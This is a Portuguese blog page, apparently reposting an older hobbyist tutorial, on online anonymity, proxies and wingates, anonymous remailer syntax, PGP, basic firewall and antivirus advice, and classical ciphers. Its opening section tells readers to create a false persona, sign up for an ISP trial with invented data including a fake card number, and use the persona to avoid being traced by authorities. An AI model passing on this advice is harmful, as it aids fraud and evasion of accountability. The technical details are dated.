domingo, 30 de janeiro de 2011

ANONIMIDADE#

Anônimo
(INTRODUÇÃO)
Anônimo, adj. Sem nome; não assinado; que não tem
o nome do autor; pouco conhecido; obscuro: artista anônimo; (com.) diz-se da sociedade comercial que não é designada por nome ou firma, e sim por título que designa o fim social ou a sua natureza; s.m. aquele que não assina o que escreve; indivíduo sem renome. (Do gr. anonymos).

     Pois bem, ser anônimo na Internet é fazer e participar de tudo que os outros participam mas sem deixar vestígios de sua origem.

Isto inclui desde navegar sem revelar seu IP, participar de IRC(ou ICQ) sem ser denunciado e bombardeado, mandar e-mail sem revelar o remetente, etc...
Como navegar sem se revelar, já coloquei na parte sobre Proxy/Wingate.

     Aqui vou falar sobre ser anônimo de uma maneira quase total... criando uma nova identidade.
Porque criar uma nova identidade???

Pois é... a maneira mais eficiente de ser anônimo...
     Primeiramente, crie um nome e uma personalidade (pode ser homem ou mulher).
Vou dar um exemplo "criando" um internauta do nada.

Sou homem mas vou criar uma mulher (isto existe aos montes nas salas de bate-papo).

Nome: Carla Cristina Alves
(criei agora ..se for igual ao de alguém real é coincidência)
Idade: 19 anos

Nick: **Athena** (Deusa grega, ohhh!)
Interesses: Criptografia, Hacker, Pascal, Fortran :-)


     Pois bem... se for possível, criaremos uma conta para ela em algum provedor que ofereça testdrive (tipo UOL, ZAZ etc.) este testdrive geralmente é de 30 horas gratuitas. Preencha tudo com dados criados inclusive número do cartão.

     Além de tudo isso, existe uma maneira de usar o telefone de alguém "emprestado", mas isto seria fraude telefônica... fica para uma próxima HP :-))

     Se não for possível não tem problema, use sua conta mesmo... agora, ela precisa de um e-mail... dê uma olhada em "e-mail".

     Criamos 3 e-mails para ela, todos preenchidos com os dados criados e sempre via Proxy. O primeiro e-mail é um redirecionador, ele somente recebe as mensagens e manda para outro que tenha acesso via Web (mais seguro que POP, pois seu IP não poderá ser achado se usar proxy).

      Uma boa idéia é criar uma Home Page para ela... bem simples tipo "oi eu sou Carla". Fora cadastrá-la nos serviços como ICQ, listas de discussão etc... tudo que você tenha interesse.

      Mas lembre-se, tudo é feito utilizando-se de proxy e dados falsos, mas coerentes. Pronto sua identidade já existe... agora cabe a você torná-la famosa ou odiada, desconhecida ou amada. Você pode dizer que isso é inútil, mas acredite em mim, não é não... caso tenha problemas, vai ser bem mais difícil as pessoas e autoridades, acreditarem que a bela menina é na verdade esta figura triste e ridícula... você!

      Uma das formas de acesso anônimo que eu não iria falar, é a das conexões Telnet. Por quê? Simples... quantos de vocês usam Telnet??? Somente alguns mais avançados, e como já sabem, estou tentando ser o mais básico possível nesta página.

     Pois bem... como ser anônimo via Telnet?

     Usando wingates, que nada mais são do que uma forma de Proxy.

No terminal Telnet digite:
endereço.do.wingate:1080
estabelecida a conexão digite o endereço final da conexão. Pronto!
     Em "Links" você acha um endereço com milhares de wingates e proxys.
     Outra utilização dos wingates é o IRC e ICQ, com certeza vocês já viram que provavelmente estes são os serviços da Internet mais inseguros, existem milhares de aplicativos capazes de descobrir seu IP, desconectá-lo, apagar arquivos do seu HD, tudo via IRC ou ICQ. Antigamente somente especialistas podiam fazer isto... hoje, estes softwares são distribuídos em grande escala e qualquer mané que tem uma cópia se acha o "Rei dos Hackers".

     Por isto se você é daqueles que fazem inimigos facilmente, proteja-se.

Proxy/Wingate
       Este é um tema muito interessante e pouco conhecido pela maioria das pessoas.   Mas, o que é este tal de Proxy????
       Proxy é um software (ou conjunto Hardware/Software) muito utilizado por empresas e provedores para armazenar páginas visitadas pelos usuários destas redes e isolar o acesso entre rede interna e internet.
       Geralmente, quando nos referimos a Proxy (servidor proxy), estamos falando da máquina onde o software está rodando.
       Sua intenção, ao contrario do que parece, é das melhores! Ele armazena uma home-page em seu disco rígido para que a próxima pessoa que quiser visitar aquela página não tenha que esperar muito tempo para ela ser carregada.
       Vejamos o exemplo:
     -  Você digita no seu Browser : www.yahoo.com.br  
     -   Imediatamente, um pedido é feito ao seu provedor; que procura por aquela página.
     -  Ao achá-la, ele tira uma cópia, coloca no Proxy e manda o arquivo para você.
     -  Quando um outro usuário digitar www.yahoo.com.br, o Proxy não irá procurar na internet pelo endereço. Ele simplesmente manda aquela cópia que tirou quando você visitou o endereço.
    Espero que tenha ficado claro!
    Por ai se tira algumas conclusões...Algumas óbvias; outras, nem tanto.
    - Todo os lugares que você visitou estão guardados no provedor.
    - É possível utilizá-lo para ficar anônimo. 
A primeira é preocupante... Mas, dependendo do método de armazenamento do provedor, não tem que se preocupar.
     A segunda é o que realmente interessa! Vamos analisar o pedido à página do Yahoo/BR: quando você requisitou a página do yahoo, o servidor do yahoo gravou em seu arquivo de LOG o IP de origem do pedido.
     Assim, qualquer página que você visitar gravará de onde veio o pedido. Mas, se o pedido for feito através de um Proxy, o IP que será logado será o do servidor proxy.
     Desta maneira, caso alguém tente se conectar ao seu computador com esta informação, NÃO será possível, para este alguém, lhe localizar.
     Um exemplo muito comum: Você está aqui lendo esta página...Seu IP foi gravado pela página inicial... Qualquer pessoa pode ir ao contador de visitas, onde está o arquivo de log desta página, e procurar por alguém que a tenha visitado nos últimos 2 minutos. Provavelmente esta pessoa ainda está conectada. Com seu endereço de IP as possibilidades são muitas( derrubar a conecção, infectar com trojan, etc.).
     Mas, se você visitou esta página via proxy o IP será o do proxy e não o seu.
   Atenção: não queira instalar um programa de proxy, wingate, sygate ou qualquer coisa do tipo, no seu microcomputador... Estes softs servem apenas para quem tem redes internas e precisa conectá-las à internet a um custo baixo. TODO soft tem bugs (falhas) e se voce instalar um destes ficará mais exposto à invasões. Além do mais, ele  NÃO esconderá a sua identidade!
     Mas, será que todo proxy é anônimo??? Não. Infelizmente!
     Para saber se o proxy que você escolheu é anônimo ou não, visite os links abaixo:
     Nestes sites você verá que tipo de informações eles conseguem tirar de seu browser.
     Alguns deles fornecem os HTTP-HEADERS, que fazem parte da requisição de páginas na web. Estes, você deve procurar; por exemplo; pelos seguintes:
  • REMOTE_ADDR: seu ip
  • REMOTE_HOST: seu host
  • HTTP_X_FORWARDED_FOR: proxy; mostra o IP de quem o utiliza (dedo-duro)
  • HTTP_USER_AGENT: seu browser
  • FORWARDED: mostra o proxy usado
  • VIA: mostra uso do proxy
  • CLIENT_IP: seu IP novamente revelado pelo proxy
  • HTTP_FROM: seu IP novamente revelado pelo proxy
     Caso algum deles revele seu IP ou nome do provedor ,pode descartá-lo. Procure outro! É raro, mas alguns deles escondem seu Browser e sistema operacional (Win95/98, Linux, BeOS,etc). Neste caso, eu recomendo o Proxomitron.
     Como achar os proxys e wingates???
     Clique em recent checked e, depois, em Submit. Ele lhe mostrará uma lista com 2000 proxys e wingates verificados recentemente. Lembre-se: porta 1080 são Wingates. Porta 8000,8080,3126, geralmente, são proxys.Use os wingates com ICQ, IRC, e-mail; e os proxys para navegar com seu browser.
     Um excelente programa para filtrar cookies, banners ,java e utilizar proxy ao mesmo tempo é o Proxomitron; um programa gratuito, pequeno , simples, mas imbatível para navegar pela Net de forma segura.
     Outra forma de usar proxy são aqueles proxys com interface via Web. Mas nestes casos é necessario ir a página do serviço de proxy e digitar a URL do lugar que você quer visitar. Mais prático é usar o browser configurado para usar proxy.


E-Mail
   Talvez seja o que mais uso na internet.
   E é também onde é difícil ser anônimo.
   Se você acessa a internet pelo seu trabalho ou escola, saiba que boa parte das empresas filtram os e-mail, palavras chaves ou endereços suspeitos são selecionados e quando encontrados uma cópia do e-mail vai para o administrador. Afinal você pode estar roubando segredos da sua firma.
   Neste ponto você diz "Eu uso um WebMail" tipo aquelas ZipMail, BOL, Yahoo, Hotmail, etc....
   Otimo você é meio anônimo.. mas meio anônimo é metade de nada.. Este tipo de mail só fica anônimo se você entra na página dele através de um proxy anônimo.
   Caso queira um Webmail visite nosso próprio WebMail
   Meio anônimo pois cada vez que voce manda um e-mail destes seu IP vai junto com a mensagem. Assim é possível saber de onde veio o e-mail. Ou seja não da para xingar seu chefe assim. Uma possível solução é usar um proxy quando entrar na página do WebMail (nem sempre ele aceita) ,outra seria utilizar o REMAILER. Agora sim entramos no assunto Cyberpunk.
   Oque são remailers?
   São servidores que basicamente pegam uma mensagem e redirecionam para o destinatário excluído toda e qualquer informação que possa servir para localizar o remetente. A mensagem é tão anônima que não dá prá quem receber dar REPLY, pois vai para lugar nenhum. E você não tem que entrar on-line no servidor de remailer, manda direto do Outlook ou teu programa de e-mail.
   Existe duas maneiras de usar remailer: a fácil e a outra. As duas são iguais em seu conteudo.Somente que a fácil se utiliza de programas que fazem todo o serviço braçal para você, a outra você tem que escrever tudo na mão mesmo. Entre os fáceis eu recomendo o soft Jack B. Nymble .
   Mas eu vou te ensinar a fazer na mão mesmo....não é tão complicado assim (ou quase).
   O remailer escolhido para exemplo é o da REPLAY.COM , muito famoso e eficiente. Mas o método é basicamente igual para todos os remailers.
   O percurso da mensagem é:
VOCÊ -> To: Remailer -> Anonimiza para: destino. 
   Como primeiro teste vamos mandar uma mensagem para você mesmo...seu@endereço.com.br via replay.com
   Abra seu soft de e-mail e mande uma mensagem Para(To): remailer@replay.com
   No corpo da mensagem (começando da primeira linha):
::
Request-Remailing-To: seu@endereço.com.br
teste do remayler que eu aprendi com o Otto
   Note os :: depois dele o remailer busca o endereço do remetente. Assim, na linha debaixo dos :: tem que ir as informações conforme mostramos, e não pule linha. A linha Request-Remailing-To: também pode ser: Anon-To:
   Ele vai receber: From (de): nobody@replay.com, sem seu IP, sem endereço, sem precisar se cadastrar nada. Mas você não pode receber mensagens via remailer. Para isso use o WebMail e sempre que entrar lá use proxy.
 Mais não acabou tem muito mais:
  Se mandar: De (from): maluko@doido.com 
Para (To): remailer@replay.com (isso nos campos De: / Para: do seu outlook/Eudora/messenger, etc...)
   No corpo da mensagem, a partir da primeira linha:
::
Request-Remailing-To:seu@endereço.com.br
## Subject: Mensagem teste com subject
Fala ai seu mané! 
   Pronto agora sua mensagem tem um subject(assunto)
   Bom, agora vamos supor que o cara ainda possa, apesar de não saber de onde veio, desconfiar que foi você porque sabia que você estava on-line no momento qua a mensagem foi mandada. Ai você usa a opção de atraso na postagem.
 
Conforme abaixo: 
De (from): maluko@doido.com 
Para (To): remailer@replay.com (isso nos campos De: / Para: do seu outlook/Eudora/messenger, etc...) 
   No corpo da mensagem, a partir da primeira linha: 
::
Request-Remailing-To: joao@silva.com.br
Latent-Time: +1.00
## Subject: mensagem prá um mané
Fala ai seu mané!
   Nesse caso a mensagem só será mandada pro João, 1 hora depois de você ter mandado para o Replay.com também é possível chutar ramdomicamente o tempo de delay, colocando um " r" depois do tempo. exemplo: +1.00r causará um atraso ramdômico nunca menor que 1 hora. Também podemos atrasar a mensagem até uma determinada hora, exemplo: Latent-Time: 18.00 irá atrasar a mesagem até as 6 da tarde. Isso baseado no horário da Europa central: CENTRAL EUROPEAN TIME.
   Vamos supor que você use para mandar e receber mensagens normais, o Nettaxi. Então quando mandar anonimamente, o caminho será do seu micro para a nettaxi (ou o seu provedor) dele para o replay e do replay para o destinatário. O destinatário só sabe que veio via replay. mais nada, mas a nettaxi (no exemplo) coloca no fim de toda mensagem que parte dela, uma propaganda. O cara que receber, apesar de não ter referencias a nettaxi no HEADER (cabeçalho) da mensagem, ve a propaganda e sabe que se originou lá. Como corrigir isso? simples!
Veja o exemplo: De (from): seu@endereco.com.br 
Para (To): remailer@replay.com (isso nos campos De: / Para: do seu outlook/Eudora/messenger, etc...) No corpo da mensagem, a partir da primeira linha: 
::
Request-Remailing-To: joao@silva.com.br
Cutmarks: --
## Subject: mensagem prá um mané
Fala ai seu mané!
--
(daqui prá baixo fica cortado) O remailer nesse caso, corta tudo abaixo de --
 
   Esta praticamente 90% anônimo...mas falta os 10%. A mensagem trafega pela internet até o Remailer (Replay.com nos nossos exemplos). Até lá o conteudo dela pode ser traçado com sniffers, etc... Como garantir que ninguém no caminho até o remailer vai poder traçar e ler a msg (tipo seu provedor de acesso ou outros no caminho)?
   Usando o PGP!
   A mensagem vai encriptada com PGP até o Remailer. Lá ele desencripta e manda para o destinatário. Isso garante que ninguém no seu provedor de acesso ou caminho até o Remailer vai poder ler. Para isso basta usar a PUBLIC KEY do remailer. Sobre como usar o PGP você encontra aqui mesmo no site, acessando a seção PGP.
   Vamos a um exemplo: Primeiro você tem que ter a chave publica do remailer. Vamos supor que você vai usar o remailer: CYPHERPUNKS.CA e a public key é (essa public key não é a correta, é apenas um exemplo)
: -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6 m
AMiKQ14bKT0Ivdj3MdbCjAG6Cs5ULYBS1ZWSLA OufN7FT2iK0Mbuyk+dZgHG6ScicDkImysRkmso7eh5c9m9V8K Re4h2XHpwSTtpx3zZpk4CsexLGCQNXF+ikm236U0rNAAUR tCpQc2V1ZG9ueWsaWFzQGFscGhhLmMyLm9yZz4= =xmQf
-----END PGP PUBLIC KEY BLOCK-----
   Então você compõe o corpo (texto) da mensagem e encripta com essa chave publica. Dai cria via seu programa de e-mail a mensagem normalmente, com FROM, TO, ::, Anon-To:, Latency, cutmarks, etc... Montado o HEADER básico, inclua: 
Encrypted: PGP
pule uma linha, coloque o texto encriptado, por exemplo:
----- BEGIN PGP MESSAGE-----
th3yh3rh56uhjrthtyj578oi57kuykl869ol689ol68oil678il68l869l6 oç90p´789lktyhjumdkotu34o5uo6pwerjt~pWEKRP24854564VJ IKYIO,IUOOP6T7U6LÇGFLjhiuyiukmoiugbkjrtopyipotyhpotiuyt
-----END PGP MESSAGE-----
   Depois pode colocar qualquer texto que não será encriptado para mandar junto, tipo seu e-mail para reply, etc... e pronto. Se alguém interceptar a mensagem no caminho até o remailer, não vai poder ler o conteúdo do texto encriptado. Apenas vai ler a parte não codificada. Ao chegar no remailer, ele desencripta e manda pro destinatário. Um exemplo então de uma mensagem prontinha para mandar:
De (from): maluko@doido.com 
Para (To): remailer@replay.com (isso nos campos De: / Para: do seu outlook/Eudora/messenger, etc...) No corpo da mensagem, a partir da primeira linha:
::
Request-Remailing-To: joao@silva.com.br 
Latent-Time: +1.00 
Encrypted: PGP 
----- BEGIN PGP MESSAGE---
3yh3rh56uhjrthtyj57857kuykl869ol689ol68oil678il68l869l6 p9olç9oç90p´7otu34o5uo6pwerjt~pWEKRP24854564VJ JIKMUYIO,IUOL,IFLjhiuyiukmoiugbkjrtopyipotyhpotiuyt
-----END PGP MESSAGE-----
Oi mané (essa parte vai sem encriptação pois está após END PGP MESSAGE) 
   Mas lembre-se, você tem que encriptar usando a chave publica do respectivo remailer, coisa que você consegue acessando o site dele ou pedindo via e-mail. Você pode também encadear remailers, usando encadeamento de chaves envelopando uma na outra. É isso. Agora a lição prática é você testar tudo mandando para você mesmo.
 
   Não começe a mandar mensagens sem pegar prática com isto antes.
   Ou use o Jack B. Nymble que é mais fácil


Big-Brother

  Uma coisa que você vai ouvir falar muito, em sites sobre segurança,e principalmente em sites ciberpunks.
  Mas oque é Big-brother?
  Bem este termo surgiu com o livro "1984" de??????? , neste livro o autor descreve uma sociedade do futuro (1984 era um futuro distante para a época), onde as pessoas são controladas e vigiadas pelo governo ou corporações.
  Assim neste futuro todas suas ações são observadas e censuradas pelo "irmão mais velho" que seria as pessoas que tem o poder.
  Você pode dizer: "Mas isto é so fantasia". Bem mas será que o futuro não sera assim??
  Veja alguns exemplos do presente:
- Toda a comunicação de internet de vários paises são censuradas. Entre eles: Kuait, China,Emirados Árabes.
- Todo usuario da AOL tem suas comunicações monitoradas. Não acredita? leia com atenção o contrato de adesão da AOL.
- Existe uma lista de softwares que instalam uma série de DLL que mandam informações sobre oque e onde você esta passeando pela internet.Veja detalhes em "espião Aureate"
- Na Inglaterra varias cidades tem sistemas de câmeras que seguem todos seus passos pela cidade, conectado a um sistema computadorizado pode ter sua ficha completa em segundos.
- Os Estados Unidos admitiu ter um sistema capaz de interceptar qualquer informação que passe pela internet. Inclusive admitiu ter usado o sistema para que empressas americanas ganhassem concorrências internacionais.O nome do sistema:"Echelon".
  Se tudo isto acontece hoje...Oque será que o amanhã reserva?

  Como se defender?
  Não abrindo mão de sistemas de criptografia eficientes e seguros, Ficando atento a qualquer projeto de lei inocente que visa proteger o cidadão e na verdade apenas agride seu direito de liberdade, denunciando empressas que adotam normas facistas de controle de seus clientes ou funcionários.
Postado por às Nenhum comentário:

SEGURANÇA#

Segurança

  Segurança é algo que todos queremos. Não ter que se preocupar com algum perigo.
  Mas quais os perigos que se enfrenta na internet?
  São muito variados.Mas podem ser divididos em partes como indicado abaixo:
- Cookies -Uma partícula de dados que ajuda os sites a lembrarem quem você é. Na maioria dos casos, você não sabe que um site está transferindo um cookie para a sua máquina ou o que ele contém.
- Vírus, Worms e Trotes -Um vírus é um programa que se duplica e espalha de PC para PC. Geralmente com o potencial para destruir dados e danificar o sistema.
- Acesso ao seu computador -Aqui esta os famosos trojans e invasões feitas diretamente por outro usuário(hacker).
- Espionagem -Os seus e-mail passam por muitas mãos antes de chegarem ao seu destina final, criando várias oportunidades para olhos curiosos.
- Códigos mal intencionados -Applets e scripts fazem da Web uma coisa mais interativa.Mas nas mãos erradas, Código móvel pode ser usado para apagar arquivos ou roubar dados.
- Enganação - Conhecido no Brasil como 171. Enviar um mail com um endereço falso é tão fácil quanto escrever um remetente falso atrás de um envelope.
- Históricos e cache -À medida que você navega pela Web, seu navegador vai mantendo uma relação dos locais visitados e armazena os arquivos que você carregou.
  A maioria destes casos o que esta em risco é sua privacidade, e algumas vezes seu computador (no caso dos vírus e worms).Se tudo isto acontece hoje...Oque será que o amanhã reserva?

  Como se defender?
  São vários os métodos para ter mais segurança. Mas sem abrir mão do prazer que é utilizar a internet.

INVASORES

Invasores

    Quem são os invasores?
    Os invasores são todos aqueles que tentam de maneiras ilícitas ou não conhecer mais sobre você ou seu computador.Eles podem não conseguir acesso ao seu computador, mas invadem sua privacidade.
   Assim são considerados invasores: aquele moleque metido a "hacker" que fica toda hora usando o NetBus para testar as portas de conexão de dezenas de computadores ligados a internet; assim como aquela empresa que usa Java/Cookies para manter um cadastro por onde você anda passeando pela internet para "poder melhor atende-lo".
   Também aqui esta o Big-Brother monitorando determinados sites e interceptando seus e-mails.Ou seu provedor que copia todo e-mail com determinado assunto suspeito.
    Também enquadra aqui qualquer pessoa que tenha acesso ao seu computador, além de você.
  Bem, como se defender deste tipo de coisa?
  Seguindo algumas normas de segurança:
- Tenha um Firewall instalado.Por via das dúvidas assim você saberá de onde vem as tentativas de bisbilhotagem do seu computador.
- Evite coisas como "vou testar este método para hackiar a página da NASA". Poxa o acesso a certos computadores é muito bem vigiado, e porque você vai se meter neste tipo de coisa?
- Quando estiver navegando na internet, prefira fazer isto pelos proxy.
- MANTENHA SEU ANTI-VÍRUS ATUALIZADO!!!
- Ao usar coisas como IRC/ICQ use sempre um Wingate.
- Quanto ao e-mail, use outro que não seja o seu e-mail fornecido pelo provedor.Caso escolha um Web mail como este ,lembre-se de visitá-lo através de um proxy para que seu IP não seja gravado em algum arquivo de LOG.
- Evite em bate-papos ou IRC revelar alguma "atividade suspeita" que você faça em suas horas vagas na internet.
- Apague todo dia seu cache do Browser e o histórico de onde você esteve passeando.
- Lembre-se sempre do outro lado de um bate papo pode tanto estar aquela menininha(o) meiga(o) como pode ter um fulano pronto para te aplicar um golpe.
   Mas porque este pessoal ta sempre armando golpes?
   Bem pelos motivos mais sinistros ou ridículos, tem de tudo quanto é tipo de gente na internet. por isto se você não quer ser uma vítima, fique alerta.

ICQ e IRC
    Sinceramente estes dois e seus congenêres (AIM, yahoo!Messenger, ConVC etc..) não são de meu agrado.

    Apesar do valor de sempre se poder falar com os amigos "ao vivo" sem ter que esperar pelo mail, que dependendo do caso pode demorar algumas horas; o risco deste tipo de sistema de "pager" é relativamente grande.

   Mesmo o ICQ tendo a opção de ocultar o IP isto é uma segurança fraca. Basta olhar pela Net e vc vai achar dezenas de softwares para "brincar" com usuários de ICQ.
   Para o caso do IRC o problema é a quantidade de recursos que ele tem. Explico através de programinhas (plugins) os chamados scripts de IRC a "sala" do IRC pode virar uma praça de guerra, onde somente os mais fortes sobrevivem.
    A quantidade de recursos ditos de guerra e proteção é grande e saber usa-los ou ter o script mais "forte" pode ser a salvação de seu HD.
   Minha sugestão é estude o assunto antes de se meter no IRC. Quanto ao ICQ e soft de pager do tipo o uso de conecção via um Wingate geralmente te protege da maioria dos casos.
   No IRC tambem a conecção via Wingate (socks) te da alguma segurança.
Como em cada soft a configuraçÃo para utilizar wingate ou proxy é diferente, consulte o manual do programa.
Para localizar um wingate ou proxy de uma olhada na página de proxy/wingate.

Firewall
   Este é um tema muito interessante . Oque é um Firewall????
   Firewall é um software (ou conjunto Hardware/Software) utilizado por empresas ,provedores e pessoas preocupadas com segurança em seu computador, para filtrar e/ou analisar todo tráfego de rede que passa pela máquina na qual foi instalado.
   Geralmente, quando nos referimos a Firewall, estamos falando do software.
   Vejamos o exemplo:
   Você esta calmamente passeando pela internet. Sem um firewall, você percebe que as vezes a conexão fica lenta apesar do indicador do modem estar com todas as luzes acesas; indicando que ele esta funcionando com força total. Depois de instalar o Firewall você percebe uma infinidade de tentativas de conexão a sua máquina.
    Estas tentativas de conexão são geralmente de todo tipo: ping, scan do Back Orifice, ou outro trojan, tentativas de telnet, ftp, etc.Coisas de desocupados tentando achar um computador para invadir.
   Geralmente este tipo de coisa é sem efeito se você não tem nenhum trojan instalado, mas tomam tempo de sua conexão, e podem até derrubar a conexão (tipo winNuke).
   Espero que tenha ficado claro!
   Por ai se tira algumas conclusões...Algumas óbvias; outras, nem tanto.
    - Nem todos sabem exatamente oque acontece durante o período que esta conectado com a internet .
    - A maioria do trafego de informações é inofensivo, mas parte dele pode revelar dados sobre você ou comprometer a segurança dos dados. 
   - O firewall junto com um bom anti-vírus são indispensáveis para qualquer computador conectado a internet. 
   Entre os recursos de um bom soft de firewall , esta a capacidade de filtrar cookies, conexões UDP desconhecidas, scan do B.O. ou outro trojan, tentativas de conexão por outras portas (23,21,80,1234, etc)
   Um excelente programa para filtrar cookies, banners ,java e utilizar proxy ao mesmo tempo é o Proxomitron; um programa gratuito, pequeno , simples, mas imbatível para navegar pela Net de forma segura. Mas ele não é um firewall pois somente filtra as portas de http, ou seja a porta por onde passa o trafego do seu browser.
  Se você ainda esta em dúvida se precisa ou não de um firewall.Leia este pequeno texto do Alexandre Bernardes um bom amigo meu que é um dos administradores da lista de discussão "anti-hacker" 


Vírus & Trojans

    Todos sabem o que é vírus, ou melhor vírus de computador.
    Vírus de computador são programas feitos para destruir arquivos ou de alguma maneira prejudicar o funcionamento de um computador. Eles são capazes de se autocopiar para o interior de outros programas, mudar seu formato para escapar dos programas anti-vírus, entre outras peripécias. Como dizem é a primeira forma de vida inventada pelo homem.
   Quanto aos Trojans, são uma espécie de vírus, mas geralmente eles não se autoreproduzem, eles se instalam no computador de forma oculta para habilitar a alguém na internet (ou rede local) a acessar seu computador de forma oculta.
  Bem; como se defender deste tipo de coisa?
    Tomando algumas normas simples de segurança:
- Tenha sempre um programa anti-vírus instalado e atualizado em seu computador.
- Todo arquivo (inclusive compactados) devem ser investigados pelo anti-vírus, mesmo que tenha sido seu melhor amigo a origem do arquivo. Desconfie até de sua mãe.
- Um bom anti-vírus geralmente consegue achar os trojans, mas acontece que surge um novo a cada dia, então é recomendável ter um Firewall instalado.
- Programas com muitas possibilidades de pegar novos tipos de vírus como o Outlook devem ser evitados.Ou pelo menos você deve cortar qualquer tipo de e-mail em html ou com anexos.
- Alguns programas costumam ter "bombas relógio"; ou seja trojans que ativam numa determinada data, por isto mantenha seu anti-vírus atualizado e habilitado.
- Mantenha seu anti-vírus atualizado e habilitado.
e por último:
- MANTENHA SEU ANTI-VÍRUS ATUALIZADO!!!
Digo pois é muito comum a pessoa instalar o anti-vírus e nunca mais visitar a página do fabricante para pegar um arquivo de atualização as definições de vírus.

Postado por às Nenhum comentário:

CRIPTOGRAFIA ##

Criptografia (INTRODUÇÃO)
Criptografia : Arte ou ciência de escrever em cifra;
 
De fato, o desejo por segurança existe desde que o homem habitava as cavernas, este desejo evoluiria para a criptografia quando o homem começou passa a utilizar a escrita.
   Relatos sobre métodos de "escrever secretamente" existe desde a civilização egípcia.

    Os métodos mais comuns, e de valor histórico, descrevo na páginas sobre métodos.
   Com a informática os métodos mais antigos ficaram obsoletos e inseguros, pois se antes uma pessoa determinada, com lápis e papel, podia quebrar estes métodos em algumas semanas, agora com o computador isto passa a ser questão de segundos.
      Os métodos de criptografar são inúmeros, desde métodos simples e quase que infantis; até métodos que envolvem teoria matemática e fórmulas complexas.
  Alguns destes métodos são descritos na seção Métodos.

Métodos de Criptografia
    A Criptografia é uma ciência muito antiga. Assim os métodos são os mais variados.

    Os métodos que descrevo aqui são de valor histórico. Apesar de não serem mais usados, representam uma boa oportunidade de estudo.
   Substituição - Relatos sobre este método de "escrever secretamente" existe desde a civilização egípcia. Uma de suas formas de utilização é a "diferença" que foi o método utilizado pelo imperador romano CEASAR.
O método da substituição pode ser definido como a troca de cada simbolo (ou letra) por um outro equivalente. Assim poderiamos por exemplo fazer:
A $
B %
C ^
D &
E *
e assim por diante até termos uma listagem completa de todo o alfabeto e simbolos.
   Oque se percebe neste método é a necessidade de tanto o destinatário como o remetente terem a mesma tabéla (obvio), para poderem escrever e ler a mensagem.Isto gera um problema: como enviar esta tabela sem que caia em mão erradas? Este por sinal é o problema principal de todo método de "chave simétrica" , explico: chama-se de métodos de chave simétrica a aquele método onde a mesma chave é utilizada para encriptar e desencriptar a mensagem.
   Mas voltando ao CEASAR, ele utilizava uma variação deste método onde sempre existia uma relação entre os dois lados da tabela. Assim ele fazia o seguinte:  
Original A B C D E F G H I J
Encriptada D E F G H I J L M N
Vejam que a tabela tem a seguinte relação, toda letra será substituida pela terceira letra subsequente. Matematicamente teriamos primeira letra do alfabeto + 3 = quarta letra do alfabeto e assim por diante.
Um exemplo:
Texto encriptado:   HVXH H IDFMO
texto original:   ESTE É FÁCIL
    Acho que fica claro que com paciência pode-se quebrar este método facilmente.Se tiver curiosidade de como fazer isto manualmente de forma mais rápida, que tentar todas as escolhas possíveis, veja na página de exemplo.
Outros métodos eu irei colocando a medida do interesse por algum método específico. Por isto coloque sua opiniao no fórum de criptografia.

PGP
       Apesar do que você pode estar pensando, PGP não é um partido político.
       PGP são as iniciais de Pretty Good Privacy; um programa feito por Phill Zimerman para encriptação de textos, arquivos e mensagens; utilizando-se do método de chaves públicas e privadas.
      Seu poder de criptografia é tanto que o governo americano proibiu o programa de sair do país; pois representava uma potencial "arma" estratégica.
      São atualmente vários os usos do programa; sendo muito utilizado como acessório de vários clientes de e-mail (Pegasus, Eudora, Calypso,etc.).

      O PGP é distribuído gratuitamente pela internet e, é um programa indispensável para quem quer segurança.
      Você pode achá-lo em Tucows ou; uma versão modificada, com mais recursos; em http://IRFaiad.tripod.com. Ela é conhecida como CKT. Entre seus recursos a mais ,ela pode gerar e manipular chaves RSA; muito útil para usar com servidores de e-mail anônimo. Seu "poder de criptografia" é muito maior que a versão normal.

       A zine Virtualis tem um bom artigo de seu editor (Dr. Herman) sobre o PGP.

      Abaixo eu dou um exemplo do que se parece uma mensagem criptografada com o PGP:
-----BEGIN PGP MESSAGE-----
Version: 6.0.2ckt http://members.tripod.com/IRFaiad/
qANQR1DBwUyHxbR4QB/4vn9Kn+VoNH5faVx+9pRv9Ea6hyDeEgtoty DQgrexEeq6r553LtoYnykdQ/6w2YdKOXczonbYKTn8hUff3MUe8zFYglf +HFMv9ZuTz+/G9Pm8gNCL5olhrnQ5nn9O9AzjKvqP3dAmBu+KNp60s lOvQE/67mnN/zelt4YlPsGG2fHngHtHNNrqmuwmNs/NeWl6rY8nvN9m0 dBE4mh1bEifJqSaqYxx6U4dKhE7ZvLBc3sE0ok/e1u/56YukcBiii3fH8K GauYmafeDBPTQj22xYECb9cv/IQSnJZijztX6nsygB/wNANaYjB4r3BS9 Lzhhg+l9CenkRvDGsOSqMI+PjqSSh7Me692QI2N42diGAmHzuaRFoX zuz1pCPHoVBKLD4EHSIW6Ahr5Zgwh5rjDfi5VthOkWLpc6JMlGiw0Qir 2BUHgvAXv6JsXid+pNnx5WhmNg9zF1JHp1CpA+Whvgr5Ip8OWIlQrrv3 3J057ecrrJShquDjorlpi8KkjEnE8lVqfzcXq6EjmqqqVcT8k3Af+QluvDVI/ J9M85Jm3mLxrMknvR3kbGGhgnUL2HSFWtXnmPXk0QsqWAtyD7TGK SLPVzLrUycEQHVQ/HMBjY5U9VkE6w3XeD5FPc2Ru/Jgi9hFkhNIoQD bHrzMwqfUafUxiwgQHUPecEWdMY7odjcXvJ4L7bIbDX2uRbOou0ypr4 5IIpLI6bQ13EcBNB9OdN0sTF1kICsf2x1xBXzphIjcZhWvJ6NFOSs4GfPk l4kPNXV2TgTgi8YnGyAXVlbcOZ8+xAbx90of01cJ0U+eNWvIfnClugRuQ CxYYQNulYwXMqkuVW5yODf3tLv9nlaoPqtOHptW1ns5dCFemWygSI+z QuObQ/J3p4eO2UdQh0QFVI+bt1DfWq+uMUrW5HbM4JkLKScIgntcLe h7UPutIvKdbwPWj0d5rPqFBEoQN44IJgES4YnMz5rpdTuXbipTgU04KO SUY7gzZtBQTBTclwOjTB94lXhv7FPPdCwyUvhaDapvC8zdoTXg9kgKtC K/LG+kkVSuo5IuhQYoId+UuaxeY5Tyi8ymS3tdvuLKIz4YBtccGOE7Km/B Hud2588NskDFvrmyQh76mZaWQI0oTCEUMoZPE1WIPbG1nSkORnIo=

-----END PGP MESSAGE-----
    Você acha que algum computador possa achar a chave para isto?????

     É possível; mas levaria alguns milhares ou milhões de anos tentando. O que seria fora de propósito.
     Com o PGP você pode enviar este tipo de mensagem para qualquer pessoa que tenha o PGP; e somente o destinatário poderá ler a mensagem.

